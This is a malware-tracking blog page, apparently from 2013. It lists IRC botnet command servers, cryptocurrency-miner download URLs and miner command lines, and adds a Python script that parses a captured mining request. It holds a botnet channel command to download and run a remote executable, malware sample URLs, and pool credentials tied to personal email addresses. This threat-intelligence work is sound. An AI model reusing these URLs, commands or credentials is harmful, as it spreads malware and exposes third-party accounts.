Thanks to this guy for the sample
Resolved : [t7v4d.com] To [108.170.24.42]
Server: t7v4d.com:4040
Now talking in ##tnt
Topic is '!np hxxp://3rbcool.net/g1.exe DF37A37D9E33FB9904235855863AA5D5 -r'
hosting infos:
http://whois.domaintools.com/108.170.24.42
Sunday, May 19, 2013
privatesmartscreen.nl(Bitcoin Miner hosted in Netherlands Amsterdam Denkers-ict B.v.)
DNS Queries: privatesmartscreen.nl DNS_TYPE_A 159.253.0.151
HTTP Conversations:
159.253.0.151:80 - [privatesmartscreen.nl]
Request: GET /Bitcoin/host.txt
149.210.128.55:80 - [149.210.128.55]
Request: GET /bitconi/winlogon32.exe
Request: GET /bitconi/winlogon64.exe
Request: GET /bitconi/usft_ext.dll
Request: GET /bitconi/miner.dll
Request: GET /bitconi/coinutil.dll
Request: GET /ptx.exe
Request: GET /bitconi/btc.exe
Request: GET /bitconi/phatk.exe
Dutch hacker here (miner command line with pool, worker and password): winlogon32.exe" -o hxxp://pool.50btc.com:8332/ -u jeroengroenveld@live.nl_Apex -p omega321
Samples:
hxxp://149.210.128.55/bitconi/winreg.exe
hxxp://149.210.128.55/bitconi/winlogon64.exe
hxxp://149.210.128.55/bitconi/winlogon32.exe
hxxp://149.210.128.55/bitconi/usft_ext.dll
hxxp://149.210.128.55/bitconi/miner.dll
hxxp://149.210.128.55/bitconi/coinutil.dll
hosting infos:
http://whois.domaintools.com/159.253.0.151
http://whois.domaintools.com/149.210.128.55
Saturday, May 18, 2013
pool.50btc.com(Bitcoin Miner botnet hosted in Germany Gunzenhausen Magdevelopers)
Resolved : [pool.50btc.com] To [144.76.52.43]
HTTP Requests:
hxxp://pool.50btc.com:8332/
DATA:
POST / HTTP/1.1
Authorization: Basic Y2xhdWRpYWdyem4xQGdtYWlsLmNvbV9jbGF1Og==
Content-Length: 128
X-Mining-Extensions: hostlist longpoll midstate noncerange rollntime switchto
User-Agent: Ufasoft coin-miner/0.39 (Windows NT XP 5.1.2600 Service Pack 3)
Host: pool.50btc.com:8332
Cache-Control: no-cache
{"method": "getblocktemplate", "params": [{"capabilities": ["coinbasetxn", "workid", "coinbase/append", "longpollid"]}], "id":0}
Here the hacker (miner command line; the worker in the URL is the same one the Basic auth header above authenticates as):
lsass.exe -gno -t1 -o hxxp://claudiagrzn1%40gmail.com_clau@pool.50btc.com:8332
Sample:hxxp://158.255.2.104/cucaz.exe
hosting infos:
http://whois.domaintools.com/144.76.52.43
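Added example (not code from the original post): it turns the two miner artifacts on this page into something checkable offline. It parses the captured POST to pool.50btc.com, decodes the Basic auth header to the worker name, flags the mining-specific markers (the X-Mining-Extensions header, the coin-miner User-Agent, the getblocktemplate JSON-RPC call), and pulls pool, worker and password out of both command-line forms seen here: `-o URL -u USER -p PASS` from the May 19 privatesmartscreen.nl post and credentials carried in the URL userinfo from the lsass.exe line above. The request and command lines are copied from the page (hxxp defanging kept; the stray quote around winlogon32.exe dropped); the function names and the user-agent regex are mine.

```python
import base64
import json
import re
import shlex
from urllib.parse import unquote, urlsplit

# Raw request as captured in the post above (request line, headers, blank line, JSON-RPC body).
POOL_POST = (
    "POST / HTTP/1.1\r\n"
    "Authorization: Basic Y2xhdWRpYWdyem4xQGdtYWlsLmNvbV9jbGF1Og==\r\n"
    "Content-Length: 128\r\n"
    "X-Mining-Extensions: hostlist longpoll midstate noncerange rollntime switchto\r\n"
    "User-Agent: Ufasoft coin-miner/0.39 (Windows NT XP 5.1.2600 Service Pack 3)\r\n"
    "Host: pool.50btc.com:8332\r\n"
    "Cache-Control: no-cache\r\n"
    "\r\n"
    '{"method": "getblocktemplate", "params": [{"capabilities": '
    '["coinbasetxn", "workid", "coinbase/append", "longpollid"]}], "id":0}'
)

# Miner command lines quoted in the May 19 and May 18 posts (copied from the page, hxxp kept).
CMDLINES = [
    "winlogon32.exe -o hxxp://pool.50btc.com:8332/ -u jeroengroenveld@live.nl_Apex -p omega321",
    "lsass.exe -gno -t1 -o hxxp://claudiagrzn1%40gmail.com_clau@pool.50btc.com:8332",
]

# JSON-RPC methods a pool miner calls; getwork is the older protocol, getblocktemplate the newer.
MINING_RPC_METHODS = {"getwork", "getblocktemplate"}
MINER_UA_RE = re.compile(r"coin-miner|cgminer|bfgminer|cpuminer", re.I)  # my choice of strings


def refang(url):
    """Turn the page's defanged hxxp:// back into http:// so urlsplit sees a normal URL."""
    return url.replace("hxxp://", "http://", 1)


def parse_http_request(raw):
    """Split a raw HTTP request into (method, lower-cased header dict, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, _path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")  # only the first colon separates name and value
        headers[name.strip().lower()] = value.strip()
    return method, headers, body


def worker_from_basic_auth(value):
    """Return (user, password) from an 'Authorization: Basic <b64>' value, or None."""
    scheme, _, token = value.partition(" ")
    if scheme.lower() != "basic":
        return None
    user, _, password = base64.b64decode(token).decode("utf-8", "replace").partition(":")
    return user, password


def classify_request(raw):
    """Collect pool-mining indicators from one captured request plus the worker it logs in as."""
    _method, headers, body = parse_http_request(raw)
    indicators = []
    if "x-mining-extensions" in headers:
        indicators.append("x-mining-extensions header")
    ua = headers.get("user-agent", "")
    if MINER_UA_RE.search(ua):
        indicators.append("miner user-agent: " + ua.split(" (")[0])
    try:
        rpc_method = json.loads(body).get("method")
    except (ValueError, AttributeError):
        rpc_method = None
    if rpc_method in MINING_RPC_METHODS:
        indicators.append("json-rpc " + rpc_method)
    worker = worker_from_basic_auth(headers["authorization"]) if "authorization" in headers else None
    return {"pool": headers.get("host"), "worker": worker, "indicators": indicators}


def credentials_from_cmdline(cmdline):
    """Pull pool host/port, worker and password out of a miner command line.
    Handles both '-o URL -u USER -p PASS' and '-o http://USER:PASS@HOST:PORT' (userinfo form)."""
    args = shlex.split(cmdline, posix=True)
    opts = {a: args[i + 1] for i, a in enumerate(args) if a in ("-o", "-u", "-p") and i + 1 < len(args)}
    url = urlsplit(refang(opts.get("-o", "")))
    user = opts.get("-u") or (unquote(url.username) if url.username else None)
    password = opts.get("-p") or (unquote(url.password) if url.password else "")
    return {"pool": url.hostname, "port": url.port, "user": user, "password": password}


def cmdline_matches_wire(raw, cmdline):
    """True when the worker on the command line is the one authenticating in the captured request."""
    wire = classify_request(raw)["worker"]
    cmd = credentials_from_cmdline(cmdline)
    return wire is not None and wire == (cmd["user"], cmd["password"])


if __name__ == "__main__":
    print(classify_request(POOL_POST))
    for line in CMDLINES:
        print(credentials_from_cmdline(line), "matches wire:", cmdline_matches_wire(POOL_POST, line))
```

Running it shows the Basic auth header decodes to `claudiagrzn1@gmail.com_clau` with an empty password, i.e. exactly the worker in the lsass.exe `-o` URL, so the capture and the sample's command line point at one pool account; the worker name is the pivot to search other captures and samples for, since the binary name (lsass.exe, winlogon32.exe) changes between drops while the pool account does not.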
hi.loldump.org(irc botnet hosted in France Roubaix Ovh Systems)
Resolved : [hi.loldump.org] To [176.31.123.56]
Server: 176.31.123.56:8782
Server Password:
Username: __x00
Nickname: {iNF-00-DEU-XP-DELL-9523}
Channel: #scanner# (Password: )
Channeltopic: :.join #scanner2
hosting infos:
http://whois.domaintools.com/176.31.123.56
Friday, May 17, 2013
95.86.207.142(irc botnet hosted in Russian Federation Yaroslavl' Ojsc Rostelecom Yaroslavl Branch)
Server: 95.86.207.142:1866
Channel: #!x!
hosting infos:
http://whois.domaintools.com/95.86.207.142